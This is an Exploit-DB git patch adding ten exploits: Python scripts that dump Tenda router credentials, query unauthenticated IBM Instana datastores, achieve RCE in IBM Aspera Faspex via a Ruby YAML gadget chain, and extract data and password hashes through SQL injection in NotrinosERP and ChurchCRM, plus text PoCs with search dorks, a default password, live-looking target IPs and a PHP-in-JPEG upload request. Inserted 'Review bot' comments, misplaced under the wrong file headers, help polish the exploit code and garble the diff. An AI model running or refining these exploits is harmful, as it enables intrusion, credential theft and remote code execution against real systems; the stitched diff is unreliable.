From 99cef8d064e7374e94232e9768abed7753b7eddb Mon Sep 17 00:00:00 2001
From: Exploit-DB
Date: Sat, 8 Apr 2023 00:16:27 +0000
Subject: [PATCH] DB: 2023-04-08
11 changes to exploits/shellcodes/ghdb
Snitz Forum v1.0 - Blind SQL Injection
Franklin Fueling Systems TS-550 - Exploit and Default Password
Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing
MAC 1200R - Directory Traversal
Docker based datastores for IBM Instana 241-2 243-0 - No Authentication
IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
ChurchCRM 4.5.1 - Authenticated SQL Injection
NotrinosERP 0.7 - Authenticated Blind SQL Injection
Rukovoditel 3.3.1 - Remote Code Execution (RCE)
Wondershare Dr Fone 12.9.6 - Privilege Escalation
---
exploits/asp/webapps/51323.txt | 24 ++++++
exploits/hardware/remote/51317.py | 108 +++++++++++++++++++++++++++
exploits/hardware/remote/51321.txt | 60 +++++++++++++++
exploits/hardware/webapps/51315.txt | 16 ++++
exploits/multiple/remote/51314.py | 87 ++++++++++++++++++++++
exploits/multiple/remote/51316.py | 110 ++++++++++++++++++++++++++++
exploits/php/webapps/51318.py | 88 ++++++++++++++++++++++
exploits/php/webapps/51319.py | 61 +++++++++++++++
exploits/php/webapps/51322.txt | 57 ++++++++++++++
exploits/windows/local/51324.txt | 51 +++++++++++++
files_exploits.csv | 10 +++
11 files changed, 672 insertions(+)
create mode 100644 exploits/asp/webapps/51323.txt
create mode 100755 exploits/hardware/remote/51317.py
create mode 100644 exploits/hardware/remote/51321.txt
create mode 100644 exploits/hardware/webapps/51315.txt
create mode 100755 exploits/multiple/remote/51314.py
create mode 100755 exploits/multiple/remote/51316.py
create mode 100755 exploits/php/webapps/51318.py
create mode 100755 exploits/php/webapps/51319.py
create mode 100644 exploits/php/webapps/51322.txt
create mode 100644 exploits/windows/local/51324.txt
diff --git a/exploits/asp/webapps/51323.txt b/exploits/asp/webapps/51323.txt
new file mode 100644
index 000000000..a6c18b37d
--- /dev/null
+++ b/exploits/asp/webapps/51323.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Snitz Forum v1.0 - Blind SQL Injection
+# Date: 13/03/2023
+# Exploit Author: Emiliano Febbi
+# Vendor Homepage: https://forum.snitz.com/
+# Software Link: https://sourceforge.net/projects/sf2k/files/
+# Version: ALL VERSION
+# Tested on: Windows 10
+
+[code]
+._ _______.
+*/ ///______I
+) . /_(_)
+/__/ *0day PoC*
+
+
+http://www.site.com/forum/cal.asp?date=25/03/2023 <= SQLi ???
+
+http://www.site.com/forum/log.asp?log_id=3456 <= Blind SQLi #!WORK!#
+
+._________.
+*/ ///______I
+) . /_(_)
+/__/*0day PoC End*
+[/code]
\ No newline at end of file
diff --git a/exploits/hardware/remote/51317.py b/exploits/hardware/remote/51317.py
new file mode 100755
index 000000000..63010cd32
--- /dev/null
+++ b/exploits/hardware/remote/51317.py
@@ -0,0 +1,108 @@
+#!/usr/bin/python3
+
+# Exploit Title: Tenda N300 F3 12.01.01.48 - Malformed HTTP Request Header Processing
+# Shodan Dork: http.favicon.hash:-2145085239 http.title:"Tenda | LOGIN"
+# Date: 09/03/2023
+# Exploit Author: @h454nsec
+# Github: https://github.com/H454NSec/CVE-2020-35391
+# Vendor Homepage: https://www.tendacn.com/default.html
+# Product Link: https://www.tendacn.com/product/f3.html
+# Version: All
+# Tested on: F3v3.0 Firmware (confirmed)
+# CVE : CVE-2020-35391
+
+import re
+import os
+import sys
+import argparse
+import base64
+import requests
+import subprocess
+try:
+ import mmh3
+ import codecs
+except ImportError:
+ print("[!] Install mmh3: pip3 install mmh3")
+ sys.exit()
+
+Color_Off="\033[0m"
+Black="\033[0;30m" # Black
+Red="\033[0;31m" # Red
+Green="\033[0;32m" # Green
+Yellow="\033[0;33m" # Yellow
+Blue="\033[0;34m" # Blue
+Purple="\033[0;35m" # Purple
+Cyan="\033[0;36m" # Cyan
+White="\033[0;37m" # White
+
+def ip_checker(ip):
+ if "/" in ip:
+ splited = ip.split("/")
+ if "http://" in ip or "https://" in ip:
+ return f"{splited[0]}://{splited[2]}"
+ else:
+ return f"http://{splited[0]}"
+ else:
+ return f"http://{ip}"
+
+def is_tenda(ip):
+ try:
+ response = requests.get(f'{ip}/favicon.ico')
+ favicon = codecs.encode(response.content, "base64")
+ favicon_hash = mmh3.hash(favicon)
+ if favicon_hash == -2145085239:
+ return True
+ return False
+ except Exception as error:
+ return False
+
+def password_decoder(data):
+ try:
+ for nosense_data in data.split("\n"):
+ if ("http_passwd=" in nosense_data):
+ encoded_password = nosense_data.split("=")[-1]
+ break
+ password_bytes = base64.b64decode(encoded_password)
+ password = password_bytes.decode("utf-8")
+ if (len(password) != 0):
+ return password
+ return False
+ except Exception as error:
+ return False
+
+def main(db):
+ for ip in db:
+ ip_address = ip_checker(ip)
+ tenda = is_tenda(ip_address)
+ header = print(f"{Green}[+]{Yellow} {ip_address}{Color_Off}", end="") if 
tenda else print(f"{Red}[-]{Yellow} {ip_address}{Color_Off}", end="")
+ try:
+ output = subprocess.check_output(f"curl {ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg -A '' -H 'Accept:' -H 'Host:' -s", shell=True)
+ data = output.decode('utf-8')
+ password = password_decoder(data)
+ if password:
+ if not os.path.isdir("config_dump"):
+ os.mkdir("config_dump")
+ with open(f"config_dump/{ip_address.split('/')[-1]}.cfg", "w") as o:
+ o.write(data)
+ with open(f"credential.txt", "a") as o:
+ o.write(f"{ip_address}|{password}\n")
+ print(f"{Purple}:{Cyan}{password}{Color_Off}")
+ else:
+ print()
+ except Exception as error:
+ print()
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-i', '--ip', default='192.168.0.1', help='IP address of the target router (Default: http://192.168.0.1)')
+ parser.add_argument('-l', '--list_of_ip', help='List of IP address')
+ args = parser.parse_args()
+ db = []
+ ip_list = args.list_of_ip
+ if ip_list:
+ with open(ip_list, "r") as fr:
+ for data in fr.readlines():
+ db.append(data.strip())
+ else:
+ db.append(args.ip)
+ main(db)
\ No newline at end of file
diff --git a/exploits/hardware/remote/51321.txt b/exploits/hardware/remote/51321.txt
new file mode 100644
index 000000000..d4054d312
--- /dev/null
+++ b/exploits/hardware/remote/51321.txt
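Review bot: In main(), `subprocess.check_output(f"curl {ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg ... -s", shell=True)` interpolates an entry read verbatim from the `-l` list file (or the `-i` argument) into a shell command line, so a list entry containing shell metacharacters executes as a command on the operator's own machine. Passing an argument vector removes the shell from the path: `output = subprocess.check_output(["curl", f"{ip_address}/cgi-bin/DownloadCfg/RouterCfm.cfg", "-A", "", "-H", "Accept:", "-H", "Host:", "-s"])`. On the line before it, `header = print(...) if tenda else print(...)` binds `header` to None because print() returns nothing and `header` is never read; a plain `if tenda: print(...) else: print(...)` statement says what is meant. The `except Exception as error: return False` in is_tenda() and the matching `except Exception as error: print()` in main() also swallow every failure (DNS, timeout, decode errors) silently, so a broken run is indistinguishable from a negative result; logging `error` there would keep the best-effort behaviour while making failures visible.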
@@ -0,0 +1,60 @@
+# Exploit Title: Franklin Fueling Systems TS-550 - Exploit and Default Password
+# Date: 3/11/2023
+# Exploit Author: parsa rezaie khiabanloo
+# Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/)
+# Version: TS-550
+# Tested on: Linux/Android(termux)
+
+Step 1 : attacker can using these dorks and access to find the panel
+
+inurl:"relay_status.html"
+
+inurl:"fms_compliance.html"
+
+inurl:"fms_alarms.html"
+
+inurl:"system_status.html"
+
+inurl:"system_reports.html'
+
+inurl:"tank_status.html"
+
+inurl:"sensor_status.html"
+
+inurl:"tank_control.html"
+
+inurl:"fms_reports.html"
+
+inurl:"correction_table.html"
+
+Step 2 : attacker can send request
+
+curl -H "Content-Type:text/xml" --data '' http://IP:10001/cgi-bin/tsaws.cgi
+
+
+Step 3 : if get response that show like this
+
+
+
+
+
+
+
+
+
+
+Step 4 : attacker can crack the hashesh using john the ripper
+
+notice : most of the panels password is : admin
+
+Disclaimer:
+The information provided in this advisory is provided "as is" without
+warranty of any kind. Trustwave disclaims all warranties, either express or
+implied, including the warranties of merchantability and fitness for a
+particular purpose. In no event shall Trustwave or its suppliers be liable
+for any damages whatsoever including direct, indirect, incidental,
+consequential, loss of business profits or special damages, even if
+Trustwave or its suppliers have been advised of the possibility of such
+damages. Some states do not allow the exclusion or limitation of liability
+for consequential or incidental damages so the foregoing limitation may not
+apply.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51315.txt b/exploits/hardware/webapps/51315.txt
new file mode 100644
index 000000000..4aa0a8827
--- /dev/null
+++ b/exploits/hardware/webapps/51315.txt
@@ -0,0 +1,16 @@
+# Exploit Title: MAC 1200R - Directory Traversal
+# Google Dork: "MAC1200R" && port="8888"
+# Date: 2023/03/09
+# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd.
+# Vendor Homepage: https://www.mercurycom.com.cn/
+# Software Link: https://www.mercurycom.com.cn/product-1-1.html
+# Version: all versions. (REQUIRED)
+# Tested on: all versions.
+# CVE : CVE-2021-27825
+
+1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888".
+2. Open the affected website like "http://IP:8888/web-static/".
+3. For example:
+1)http://60.251.151.2:8888/web-static/
+
+2)http://222.215.15.70:8888/web-static/
\ No newline at end of file
diff --git a/exploits/multiple/remote/51314.py b/exploits/multiple/remote/51314.py
new file mode 100755
index 000000000..dcd0d9ff3
--- /dev/null
+++ b/exploits/multiple/remote/51314.py
@@ -0,0 +1,87 @@
+# Exploit Title: Docker based datastores for IBM Instana 241-2 243-0 - No Authentication
+# Google Dork: [if applicable]
+# Date: 06 March 2023
+# Exploit Author: Shahid Parvez (zippon)
+# Vendor Homepage: https://www.instana.com/trial/ *and* https://www.ibm.com/docs/en/instana-observability
+# Software Link: https://www.ibm.com/docs/en/instana-observability/current?topic=premises-operations-docker-based-instana
+# Version: [Vulnerable version : 239-0 to 239-2 241-0 to 241-2 243-0] (REQUIRED Version : 241-3)
+# Tested on: [Mac os]
+# CVE : CVE-2023-27290
+import argparse
+import subprocess
+import pexpect
+
+# Define the available options and their corresponding commands
+COMMANDS = {
+ "kafka": "kafka-topics --bootstrap-server {host}:{port} --list --exclude-internal",
+ "cassandra": "/bin/bash -c 'cqlsh {host} {port} && exit'",
+ "clickhouse": 'curl --insecure "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"',
+ "cockroach": "cockroach sql --host {host}:{port} --insecure",
+ "zookeeper": "echo dump |ncat {host} {port}",
+ "node-export": "curl http://{host}:{port}",
+ "elasticsearch": "curl http://{host}:{port}/_cat/indices?v",
+ "prometheus": "curl http://{host}:{port}/metrics",
+ "clickhouse": 'wget -O system_tables.csv "http://{host}:{port}/?query=SELECT%20*%20FROM%20system.tables"'
+}
+
+# Define the parser for command-line arguments
+parser = argparse.ArgumentParser(description="Script to run various commands on a host.")
+parser.add_argument("host", help="The host IP address")
+parser.add_argument("option", choices=COMMANDS.keys(), help="Select an option")
+parser.add_argument("--port", type=int, default=None, help="The port number (default: use default port for the selected option)")
+parser.add_argument("--output", help="Output the result to a file")
+parser.add_argument("--verbose", action="store_true", help="Print the command line that was executed")
+
+# Parse the command-line arguments
+args = parser.parse_args()
+
+# 
Determine the port number to use
+if args.port is None:
+ if args.option == "cassandra":
+ port = "9042"
+ elif args.option == "clickhouse":
+ port = "8123"
+ elif args.option == "cockroach":
+ port = "26257"
+ elif args.option == "elasticsearch":
+ port = "9200"
+ elif args.option == "kafka":
+ port = "9092"
+ elif args.option == "node-export":
+ port = "8181"
+ elif args.option == "prometheus":
+ port = "9090"
+ elif args.option == "zookeeper":
+ port = "2181"
+else:
+ port = str(args.port)
+
+# Build the command to execute
+command = COMMANDS[args.option].format(host=args.host, port=port)
+
+# Print the command line if verbose option is provided
+if args.verbose:
+ print(f"Executing command: {command}")
+
+# If cassandra or cockroach option is selected, use pexpect to communicate inside the interactive shell
+if args.option == "cassandra":
+ child = pexpect.spawn(command)
+ child.expect("Connected to.*", timeout=10)
+ child.interact()
+ output = child.before
+elif args.option == "cockroach":
+ child = pexpect.spawn(command)
+ child.expect("root@.*:", timeout=10)
+ child.interact()
+ output = child.before
+# If any other option is selected, execute the command and capture the output
+else:
+ output = subprocess.check_output(command, shell=True)
+
+# If an output file is provided, write the output to the file
+if args.output:
+ with open(args.output, "wb") as f:
+ f.write(output)
+
+# Print the output to the console
+print(output.decode())
\ No newline at end of file
diff --git a/exploits/multiple/remote/51316.py b/exploits/multiple/remote/51316.py
new file mode 100755
index 000000000..71743644b
--- /dev/null
+++ b/exploits/multiple/remote/51316.py
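Review bot: The `COMMANDS` dict literal carries two `"clickhouse"` keys; Python silently keeps only the last one, so the `curl --insecure "http://{host}:{port}/?query=..."` entry is dead code and the `wget -O system_tables.csv ...` form is what `--verbose` will actually print and run. Because `choices=COMMANDS.keys()` is evaluated after the duplicate has collapsed, the CLI cannot reach the curl variant either; delete one of the two lines or give the second its own key so the table says what it does. The `# Determine the port number to use` comment is also split across a line break in this listing, which the reformatted hunk shows as it stands. Note further that `command` is assembled by `str.format` from `args.host` and handed to `subprocess.check_output(command, shell=True)` in the final branch; the host is operator-supplied here, but an argument list with `shell=False` would not depend on that assumption.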
@@ -0,0 +1,110 @@
+# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
+# Date: 02/02/2023
+# Exploit Author: Maurice Lambert
+# Vendor Homepage: https://www.ibm.com/
+# Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex
+# Version: 4.4.1
+# Tested on: Linux
+# CVE : CVE-2022-47986
+
+"""
+This file implements a POC for CVE-2022-47986
+an YAML deserialization that causes a RCE in
+IBM Aspera Faspex (before 4.4.2).
+"""
+
+__version__ = "1.0.0"
+__author__ = "Maurice Lambert"
+__author_email__ = "mauricelambert434@gmail.com"
+__maintainer__ = "Maurice Lambert"
+__maintainer_email__ = "mauricelambert434@gmail.com"
+__description__ = """
+This file implements a POC for CVE-2022-47986
+an YAML deserialization that causes a RCE in
+IBM Aspera Faspex (before 4.4.2).
+"""
+license = "GPL-3.0 License"
+__url__ = "https://github.com/mauricelambert/CVE-2022-47986"
+
+copyright = """
+CVE-2022-47986 Copyright (C) 2023 Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions. 
+"""
+__license__ = license
+__copyright__ = copyright
+
+__all__ = []
+
+print(copyright)
+
+from urllib.request import urlopen, Request
+from sys import argv, exit, stderr, stdout
+from shutil import copyfileobj
+from json import dumps
+
+def main() -> int:
+
+ if len(argv) != 3:
+ print("USAGES:", argv[0], "[hostname] [command]", file=stderr)
+ return 1
+
+ copyfileobj(
+ urlopen(
+ Request(
+ argv[1] + "/aspera/faspex/package_relay/relay_package",
+ method="POST",
+ data=dumps({
+ "package_file_list": [
+ "/"
+ ],
+ "external_emails": f"""
+---
+- !ruby/object:Gem::Installer
+ i: x
+- !ruby/object:Gem::SpecFetcher
+ i: y
+- !ruby/object:Gem::Requirement
+ requirements:
+ !ruby/object:Gem::Package::TarReader
+ io: &1 !ruby/object:Net::BufferedIO
+ io: &1 !ruby/object:Gem::Package::TarReader::Entry
+ read: 0
+ header: "pew"
+ debug_output: &1 !ruby/object:Net::WriteAdapter
+ socket: &1 !ruby/object:PrettyPrint
+ output: !ruby/object:Net::WriteAdapter
+ socket: &1 !ruby/module "Kernel"
+ method_id: :eval
+ newline: "throw `{argv[2]}`"
+ buffer: {{}}
+ group_stack:
+ - !ruby/object:PrettyPrint::Group
+ break: true
+ method_id: :breakable
+""",
+ "package_name": "assetnote_pack",
+ "package_note": "hello from assetnote team",
+ "original_sender_name": "assetnote",
+ "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+ "metadata_human_readable": "Yes",
+ "forward": "pew",
+ "metadata_json": '{}',
+ "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+ "delivery_sender_name": "assetnote",
+ "delivery_title": "TEST",
+ "delivery_note": "TEST",
+ "delete_after_download": True,
+ "delete_after_download_condition": "IDK",
+ }).encode()
+ )
+ ),
+ stdout.buffer,
+ )
+
+ return 0
+
+
+if __name__ == "__main__":
+ exit(main())
\ No newline at end of file
diff --git a/exploits/php/webapps/51318.py b/exploits/php/webapps/51318.py
new file mode 100755
index 000000000..3937cbf6e
--- /dev/null
+++ b/exploits/php/webapps/51318.py
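Review bot: The module-level assignments `license = "GPL-3.0 License"` and `copyright = """..."""` shadow the `license` and `copyright` builtins that `site` installs, and `print(copyright)` runs at import time, before the `from urllib.request import urlopen, Request` block, so importing this file for its `main()` prints the banner and leaves the stdlib imports below executable code. Assign the text straight to `__license__` and `__copyright__` (the two dunders are already just copies of those names) and move `print(copyright)` under `if __name__ == "__main__":`, which lets the four imports sit at the top of the module. `from sys import ... exit ...` likewise replaces the site-provided `exit` with `sys.exit`; that one is harmless but worth a comment since the file otherwise uses plain builtins. main() is entirely within this hunk.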
@@ -0,0 +1,88 @@
+# Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection
+# Date: 11-03-2023
+# Exploit Author: Arvandy
+# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md
+# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7
+# Vendor Homepage: https://notrinos.com/
+# Version: 0.7
+# Tested on: Windows, Linux
+# CVE: CVE-2023-24788
+
+"""
+The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber.
+This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.
+The OrderNumber parameter require a valid orderNumber value.
+
+This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application.
+"""
+
+
+import sys, requests
+
+def injection(target, inj_str, session_cookies):
+ for j in range(32, 126):
+ url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))
+ headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}
+ r = requests.get(url, headers=headers)
+ res = r.text
+ if "NotrinosERP 0.7 - Login" in res:
+ session_cookies = login(target, username, password)
+ headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}
+ r = requests.get(url, headers=headers)
+ elif (r.elapsed.total_seconds () > 2 ):
+ return j
+ return None
+
+def login(target, username, password):
+ target = "%s/index.php" % (target)
+ headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+ data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)
+ s = requests.session()
+ r = s.post(target, data = data, headers = headers)
+ return 
s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')
+
+def retrieveDBName(session_cookies):
+ db_name = ""
+ print("(+) Retrieving database name")
+ for i in range (1,100):
+ injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
+ retrieved_value = injection(target, injection_str, session_cookies)
+ if (retrieved_value):
+ db_name += chr(retrieved_value)
+ else:
+ break
+ print("Database Name: "+db_name)
+
+def retrieveDBVersion(session_cookies):
+ db_version = ""
+ print("(+) Retrieving database version")
+ for i in range (1,100):
+ injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i
+ retrieved_value = injection(target, injection_str, session_cookies)
+ if (retrieved_value):
+ db_version += chr(retrieved_value)
+ sys.stdout.flush()
+ else:
+ break
+ print("Database Version: "+db_version)
+
+def main():
+ print("(!) Login to the target application")
+ session_cookies = login(target, username, password)
+
+ print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")
+ retrieveDBName(session_cookies)
+ print("")
+ retrieveDBVersion(session_cookies)
+
+if __name__ == "__main__":
+ if len(sys.argv) != 4:
+ print("(!) Usage: python3 exploit.py ")
+ print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")
+ sys.exit(-1)
+
+ target = sys.argv[1]
+ username = sys.argv[2]
+ password = sys.argv[3]
+
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51319.py b/exploits/php/webapps/51319.py
new file mode 100755
index 000000000..9098d61dc
--- /dev/null
+++ b/exploits/php/webapps/51319.py
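Review bot: `injection()` reads `username` and `password`, and `retrieveDBName()`/`retrieveDBVersion()` read `target`, as module globals that are bound only inside the `if __name__ == "__main__":` block, so any call that does not go through that block (an import, a test harness) fails with NameError instead of the usage message the script prints for bad arguments. Pass them explicitly, e.g. `def injection(target, inj_str, session_cookies, username, password):` and `def retrieveDBName(target, session_cookies):`, and thread them through from `main()`. In `login()`, `r = s.post(target, data = data, headers = headers)` is assigned but never read and the `requests.session()` is never closed; `with requests.session() as s:` around the post covers both. The `print("(!) Usage: python3 exploit.py ")` line also lost its argument placeholders, so the message tells the user nothing about what is expected. 51319.py in this same commit (`dumpUserTable`/`main` with `target`, `username`, `password`, and its `login()`) has the same global-binding and unused-`r` issues.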
@@ -0,0 +1,61 @@
+# Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection
+# Date: 11-03-2023
+# Exploit Author: Arvandy
+# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md
+# Software Link: https://github.com/ChurchCRM/CRM/releases
+# Vendor Homepage: http://churchcrm.io/
+# Version: 4.5.1
+# Tested on: Windows, Linux
+# CVE: CVE-2023-24787
+
+"""
+The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.
+This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School.
+The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.
+This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.
+
+This script is created as Proof of Concept to retrieve the username and password hash from user_usr table.
+"""
+
+
+import sys, requests
+
+def dumpUserTable(target, session_cookies):
+ print("(+) Retrieving username and password")
+ print("")
+ url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)
+ headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}
+ r = requests.get(url, headers=headers)
+ lines = r.text.splitlines()
+
+ for line in lines:
+ if "Perseverance" in line:
+ print(line.split("Perseverance")[1].split("")[0])
+
+def login(target, username, password):
+ target = "%s/session/begin" % (target)
+ headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+ data = "User=%s&Password=%s" % (username, password)
+ s = requests.session()
+ r = s.post(target, data = data, headers = headers)
+ return 
s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')
+
+def main():
+ print("(!) Login to the target application")
+ session_cookies = login(target, username, password)
+
+ print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")
+ dumpUserTable(target, session_cookies)
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 4:
+ print("(!) Usage: python3 exploit.py ")
+ print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")
+ sys.exit(-1)
+
+ target = sys.argv[1]
+ username = sys.argv[2]
+ password = sys.argv[3]
+
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51322.txt b/exploits/php/webapps/51322.txt
new file mode 100644
index 000000000..220faad5c
--- /dev/null
+++ b/exploits/php/webapps/51322.txt
@@ -0,0 +1,57 @@
+Exploit Title: Rukovoditel 3.3.1 - Remote Code Execution (RCE)
+Version: 3.3.1
+Bugs: rce via jpeg file upload
+Technology: PHP
+Vendor URL: https://www.rukovoditel.net/
+Software Link: https://www.rukovoditel.net/download.php
+Date of found: 12-03-2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+#First of all, we need to inject the php codes into the metadata of any jpeg file with exiftool. (for example)
+
+exiftool -overwrite_original -comment="" index.jpeg
+exiftool -overwrite_original -DocumentName="" index.jpeg
+
+#after that we need to get the base64 code of the image (i used this site)
+ https://h3yy0.csb.app/
+
+
+
+#and we have to do url encoding
+
+
+#now we have to upload profile photo
+
+Poc request (I changed the file name to hello.php and and pasted our base 64 code)
+
+
+
+POST /index.php?module=users/photo&action=save&token=34GtgxfEmO HTTP/1.1
+Host: localhost
+Content-Length: 9567
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+sec-ch-ua-platform: "Linux"
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/index.php?module=users/account
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: cookie_test=please_accept_for_session; sid=0d3esjp74uo3q3gp38r044vc9h; sidebar_closed=1
+Connection: close
+
+img=data%3Aimage%2Fjpeg%3Bbase64%2C%2F9j%2F4AAQSkZJRgABAQAAAQABAAD%2F4QB4RXhpZgAATU0AKgAAAAgABQENAAIAAAAWAAAASgEaAAUAAAABAAAAYAEbAAUAAAABAAAAaAEoAAMAAAABAAEAAAITAAMAAAABAAEAAAAAAAA8P3BocCBlY2hvICdzYWxhbScgPz4AAAAAAQAAAAEAAAABAAAAAf%2F%2BABU8P3BocCBwaHBpbmZvKCk7ID8%2B%2F9sAhAAJBgcSEhIVExMTFRUVFRYXFxUVFhUVFhgWFhUVFhYVFRUVGB0oIBgaJR0VFSExISUpKy4uLhcfMzgzLTcoLS4rAQoKCg4NDhoQEBstJR8lLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS3%2FwAARCAEqAKkDASIAAhEBAxEB%2F8QAGwAAAgMBAQEAAAAAAAAAAAAABAUCAwYBBwD%2FxAA8EAABAwIEAwYFAgUDBAMAAAABAAIRAyEEEjFBBVFhBiJxgZGhE7HB0fAy4RQjQlJiB3LxFVOCkhYz0v%2FEABkBAAMBAQEAAAAAAAAAAAAAAAECAwQABf%2FEACMRAAICAwEBAAICAwAAAAAAAAABAhEDITESQSJRE3EEMmH%2F2gAMAwEAAhEDEQA%2FAMhSCvYFVSaiWNWA2k2IqmFQxqJphBjIuYFcxqqar6YU2URYwK0NX1MKxKxkVOCFrBGuCFroBFWJSPHp5iSkePKrAnPhn8UhgisUhVsjwxS6fFRcplQcmQpWVxi6V1iYAVRCMphC0AjaYUpDom0KUL4BSShHdFFMQlNXscos0BLArmIdhV7CgFBNMIqmxDUkXSSMoi5rVbCraFNIxkQqIDEFGVXJfiCgEW4pyRY5yc4spFjSq4yWQT4hDq%2BsqFsXDEzpUCplQKZAKypUwolTpJgBtAIxgQtAIxgUWOiYCkvgF2EoRswq1qrYrmBSNBbTKJpqhgRNMJWFF9IIukEPSCJppGUQS0LjwuNXXJRkDVSgayPqIGuuCKsWkWNT7FpFjVXGRyCeqqSr6qoK2Ixs%2BUSpKLkUAqKtpBVlXUQiwINoBGMCGoBFtCkyiJBdhdC%2BSnDemiGBDsRFNRNBewIhiopq9oQYyCKaKpCUJTCYUWhoBO%2Bg%2BvgkodFnwiBOyi5dGOI0Fuu%2BiJyNfZtn8v6b6X2XOP6G2uiyqga6YVxFjql2IKUIrxZSPGJ1i3JJiyrYyOQVVkO5E1UO5a0Y2cUSpqLkUAqKIohUImgEWBB1AItoQ1AIpoUWURJfKQC%2BylA4bU1cxUMKuYVE0BNNEU0KwoikUGMg2gyfAXPgrcRVJv8AkbBcayAG8wHO8%2F0j6%2BaBxmLuYS1bovDSsJa46%2Fn5ZMcI0Nk7xcCJ8JSDDYq48dFsMNTytBy5Z1dmHzta0W5rTHHojPJQDjaeemH6uaBmkQSJgEjnokGIC1mJGQjdryQZtqI5m%2F5ssxj6Ra4tOxj91myKpDxdoR4wJLignWLSbEp8ZLILKqHciqg1Qz1qRkZEKJXVwpgEAiqAQ7GE7J5wjg1SpBIyt5nfwG6EmGKb4Qw7Z0Wt4B2PrVyC4FjT%2FwC0fRabsh2PY0B7h4E6nr0W6%2BG1ggAKDlfC6xpdMxg%2ByOHo3LQTzN%2Fmiv4DD%2F2N9ArOLYsCBE5vy6F%2BC78Kk3bNChS3o80arWKDArmBMSLWImkEOwImiLhKEN4jVyueOsDwFh8knxZBumPG3RUd4yPO%2FwBVnMXioF0yjtmi7ii2li8jpWx4Bxb4gykw7WMhqA%2FXSNF50yuC4X3%2FACStnwfE0gA2mXPdF%2FhkwP8AyJv42C1QRmymmxp7plvgQ076TMTe6Q46iajQ4fqbZw6bHy09ETVxThIdL7Gx29CSleHxZD80WM5m8w
